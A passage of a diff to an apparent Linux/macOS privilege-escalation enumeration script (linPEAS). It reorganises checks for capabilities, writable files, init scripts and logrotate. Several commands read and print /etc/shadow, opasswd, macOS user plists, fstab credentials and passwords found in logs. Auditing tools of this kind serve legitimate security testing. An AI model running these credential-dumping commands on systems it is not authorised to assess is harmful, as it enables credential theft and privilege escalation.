cap_value=$(echo "$cap_line" | awk '{print $2}') + if [ "$cap_name" = "CapEff:" ]; then + echo "$cap_name $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED_YELLOW},")" + else + echo "$cap_name $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED},")" + fi + done + echo "" + + else + print_3title "Current shell capabilities" (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" echo "" - echo "Parent Shell capabilities:" - (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" - else - echo "Current capabilities:" - cat /proc/self/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|0000003fffffffff,${SED_GREEN},g" + + print_3title "Parent proc capabilities" + (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" echo "" - echo "Shell capabilities:" - cat /proc/$PPID/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|0000003fffffffff,${SED_GREEN},g" fi echo "" echo "Files with capabilities (limited to 50):" @@ -4421,7 +4987,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi -##-- IF) Users with capabilities +##-- IPF) Users with capabilities if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then print_2title "Users with capabilities" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities" @@ -4432,7 +4998,7 @@ if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then echo "" fi -##-- IF) AppArmor profiles to prevent suid/capabilities abuse +##-- IPF) AppArmor profiles to prevent suid/capabilities abuse if ! [ "$SEARCH_IN_FOLDER" ]; then if [ -d "/etc/apparmor.d/" ] && [ -r "/etc/apparmor.d/" ]; then print_2title "AppArmor binary profiles" @@ -4441,7 +5007,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi fi -##-- IF) Files with ACLs +##-- IPF) Files with ACLs print_2title "Files with ACLs (limited to 50)" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls" if ! [ "$SEARCH_IN_FOLDER" ]; then @@ -4455,7 +5021,7 @@ if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v ge fi echo "" -##-- IF) Files with ResourceFork +##-- IPF) Files with ResourceFork #if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER # print_2title "Files with ResourceFork" # print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" @@ -4463,15 +5029,171 @@ echo "" #fi #echo "" +##-- IPF) Files (scripts) in /etc/profile.d/ +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Files (scripts) in /etc/profile.d/" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files" + if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + check_critial_root_path "/etc/profile" + check_critial_root_path "/etc/profile.d/" + fi + echo "" +fi + + ##-- IPF) Files (scripts) in /etc/init.d/ + if ! [ "$SEARCH_IN_FOLDER" ]; then +print_2title "Permissions in init, init.d, systemd, and rc.d" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d" + if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS + check_critial_root_path "/etc/init/" + check_critial_root_path "/etc/init.d/" + check_critial_root_path "/etc/rc.d/init.d" + check_critial_root_path "/usr/local/etc/rc.d" + check_critial_root_path "/etc/rc.d" + check_critial_root_path "/etc/systemd/" + check_critial_root_path "/lib/systemd/" + fi + + echo "" +fi + + + +##-- IPF) Hashes in passwd file +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_list "Hashes inside passwd file? ........... " + if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + ##-- IPF) Writable in passwd file + print_list "Writable passwd file? ................ " + if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else echo_no + fi + + ##-- IPF) Credentials in fstab + print_list "Credentials in fstab/mtab? ........... " + if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + ##-- IPF) Read shadow files + print_list "Can I read shadow files? ............. " + if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "Can I read shadow plists? ............ " + possible_check="" + (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + + print_list "Can I write shadow plists? ........... " + possible_check="" + (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + + ##-- IPF) Read opasswd file + print_list "Can I read opasswd file? ............. " + if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" + else echo_no + fi + + ##-- IPF) network-scripts + print_list "Can I write in network-scripts? ...... " + if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else echo_no + fi + + ##-- IPF) Read root dir + print_list "Can I read root folder? .............. " + (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no + echo "" +fi + +##-- IPF) Root files in home dirs +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Searching root files in home dirs (limit 30)" + (find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found + echo "" +fi + +##-- IPF) Others files in my dirs +if ! [ "$IAMROOT" ]; then + print_2title "Searching folders owned by me containing others files on it (limit 100)" + (find $ROOT_FOLDER -type d -user "$USER" ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec ls -l {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" + echo "" +fi + +##-- IPF) Readable files belonging to root and not world readable +if ! [ "$IAMROOT" ]; then + print_2title "Readable files belonging to root and readable by me but not world readable" + (find $ROOT_FOLDER -type f -user root ! -perm -o=r ! -path "/proc/*" 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found + echo "" +fi + +##-- IPF) Interesting writable files by ownership or all +if ! [ "$IAMROOT" ]; then + print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" + # In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all + obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$obmowbe" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -qE "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + echo "" +fi + +##-- IPF) Interesting writable files by group +if ! [ "$IAMROOT" ]; then + print_2title "Interesting GROUP writable files (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" + for g in $(groups); do + iwfbg=$(find $ROOT_FOLDER '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + if [ "$iwfbg" ] || [ "$DEBUG" ]; then + printf " Group $GREEN$g:\n$NC"; + printf "%s\n" "$iwfbg" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -Eq "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + fi + done + echo "" +fi + +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi + +if echo $CHECKS | grep -q interesting_files; then +print_title "Other Interesting Files" +########################################### +#----------) Interesting files (----------# +########################################### + + ##-- IF) .sh files in PATH if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title ".sh files in path" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path" echo $PATH | tr ":" "\n" | while read d; do - for f in $(find "$d" -name "*.sh" 2>/dev/null); do + for f in $(find "$d" -name "*.sh" -o -name "*.sh.*" 2>/dev/null); do if ! [ "$IAMROOT" ] && [ -O "$f" ]; then echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then # If write permision, win found (no check exploits) echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," else echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; @@ -4492,7 +5214,7 @@ fi ##-- IF) Date times inside firmware if [ "$SEARCH_IN_FOLDER" ]; then - print_2title "FIles datetimes inside the firmware (limit 50)" + print_2title "Files datetimes inside the firmware (limit 50)" find "$SEARCH_IN_FOLDER" -type f -printf "%T+\n" 2>/dev/null | sort | uniq -c | sort | head -n 50 echo "To find a file with an specific date execute: find \"$SEARCH_IN_FOLDER\" -type f -printf \"%T+ %p\n\" 2>/dev/null | grep \"\"" echo "" @@ -4501,9 +5223,9 @@ fi ##-- IF) Executable files added by user print_2title "Executable files potentially added by user (limit 70)" if ! [ "$SEARCH_IN_FOLDER" ]; then - find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70 + find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems|/cgroup/" | sort -r | head -n 70 else - find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70 + find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "/site-packages|/python|/node_modules|\.sample|/gems|/cgroup/" | sort -r | head -n 70 fi echo "" @@ -4534,124 +5256,20 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi -##-- IF) Files (scripts) in /etc/profile.d/ -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Files (scripts) in /etc/profile.d/" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files" - if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" - check_critial_root_path "/etc/profile" - check_critial_root_path "/etc/profile.d/" - fi - echo "" -fi - - ##-- IF) Files (scripts) in /etc/init.d/ - if ! [ "$SEARCH_IN_FOLDER" ]; then -print_2title "Permissions in init, init.d, systemd, and rc.d" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d" - if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS - check_critial_root_path "/etc/init/" - check_critial_root_path "/etc/init.d/" - check_critial_root_path "/etc/rc.d/init.d" - check_critial_root_path "/usr/local/etc/rc.d" - check_critial_root_path "/etc/rc.d" - check_critial_root_path "/etc/systemd/" - check_critial_root_path "/lib/systemd/" - fi - - echo "" -fi - -##-- IF) Hashes in passwd file -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_list "Hashes inside passwd file? ........... " - if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Writable in passwd file - print_list "Writable passwd file? ................ " - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Credentials in fstab - print_list "Credentials in fstab/mtab? ........... " - if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Read shadow files - print_list "Can I read shadow files? ............. " - if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "Can I read shadow plists? ............ " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - print_list "Can I write shadow plists? ........... " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - ##-- IF) Read opasswd file - print_list "Can I read opasswd file? ............. " - if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" - else echo_no - fi - - ##-- IF) network-scripts - print_list "Can I write in network-scripts? ...... " - if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Read root dir - print_list "Can I read root folder? .............. " - (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no - echo "" -fi - -##-- IF) Root files in home dirs -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Searching root files in home dirs (limit 30)" - (find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found - echo "" -fi - -##-- IF) Others files in my dirs -if ! [ "$IAMROOT" ]; then - print_2title "Searching folders owned by me containing others files on it (limit 100)" - (find $ROOT_FOLDER -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" - echo "" -fi - -##-- IF) Readable files belonging to root and not world readable -if ! [ "$IAMROOT" ]; then - print_2title "Readable files belonging to root and readable by me but not world readable" - (find $ROOT_FOLDER -type f -user root ! -perm -o=r ! -path "/proc/*" 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found - echo "" -fi - ##-- IF) Modified interesting files into specific folders in the last 5mins print_2title "Modified interesting files in the last 5mins (limit 100)" find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," echo "" ##-- IF) Writable log files -if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below +if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then # 3.18.0 and below print_2title "Writable log files (logrotten) (limit 50)" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation" logrotate --version 2>/dev/null || echo_not_found "logrotate" lastWlogFolder="ImPOsSiBleeElastWlogFolder" logfind=$(find $ROOT_FOLDER -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50) printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then # Only print info if something interesting found if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; @@ -4728,7 +5346,7 @@ if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then SQLITEPYTHON="" echo "" printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd + if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then # If readable and filecmd and sqlite, or readable and not filecmd if [ "$(command -v sqlite3 2>/dev/null)" ]; then tables=$(sqlite3 $f ".tables" 2>/dev/null) #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" @@ -4750,7 +5368,7 @@ if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then else columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) fi - #Check found columns for interesting fields + # Check found columns for interesting fields INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") if [ "$INTCOLUMN" ]; then printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" @@ -4781,56 +5399,18 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi ##-- IF) All hidden files -print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" -find $ROOT_FOLDER -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 +print_2title "All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" +find $ROOT_FOLDER -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme|\.travis.yml" | head -n 70 echo "" -##-- IF) Readable files in /tmp, /var/tmp, bachups +##-- IF) Readable files in /tmp, /var/tmp, backups if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" - filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) + filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | grep -Ev "dpkg\.statoverride\.|dpkg\.status\.|apt\.extended_states\.|dpkg\.diversions\." | head -n 70) printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done echo "" fi -##-- IF) Interesting writable files by ownership or all -if ! [ "$IAMROOT" ]; then - print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" - #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$obmowbe" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -qE "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - echo "" -fi - -##-- IF) Interesting writable files by group -if ! [ "$IAMROOT" ]; then - print_2title "Interesting GROUP writable files (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" - for g in $(groups); do - iwfbg=$(find $ROOT_FOLDER '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - if [ "$iwfbg" ] || [ "$DEBUG" ]; then - printf " Group $GREEN$g:\n$NC"; - printf "%s\n" "$iwfbg" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -Eq "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - fi - done - echo "" -fi - ##-- IF) Passwords in history cmd if [ "$(history 2>/dev/null)" ] || [ "$DEBUG" ]; then print_2title "Searching passwords in history cmd" @@ -4868,44 +5448,27 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi ##-- IF) IPs inside logs -if [ "$DEBUG" ]; then +if [ "$DEBUG" ] || ( ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$SEARCH_IN_FOLDER" ] ); then print_2title "Searching IPs inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 + (find /var/log/ /var/logs /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 echo "" fi ##-- IF) Passwords inside logs if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Searching passwords inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," + (find /var/log/ /var/logs/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|modules-config/config-set-passwords\|config-set-passwords already ran\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," echo "" fi -if [ "$DEBUG" ]; then +if [ "$DEBUG" ] || ( ! [ "$FAST" ] && 